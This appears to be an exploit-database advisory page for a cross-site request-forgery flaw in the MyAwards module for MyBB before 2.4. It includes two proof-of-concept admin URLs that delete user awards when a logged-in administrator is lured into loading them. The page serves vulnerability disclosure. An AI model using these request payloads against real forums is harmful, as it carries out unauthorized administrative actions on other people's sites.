header-logo
Suggest Exploit
vendor:
MyAwards
by:
SecurityFocus
7,5
CVSS
HIGH
Cross-Site Request-Forgery
352
CWE
Product Name: MyAwards
Affected Version From: MyAwards 2.3
Affected Version To: MyAwards 2.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

MyAwards Module for MyBB Cross-Site Request-Forgery Vulnerability

MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability. An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.

Mitigation:

Implementing a secure validation mechanism for all requests and using a secure transport protocol such as HTTPS can help mitigate this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/69386/info

MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.

An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.

Versions prior to MyAwards 2.4 are vulnerable. 

https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1

Navigation

Suggest Exploit

Services By CQR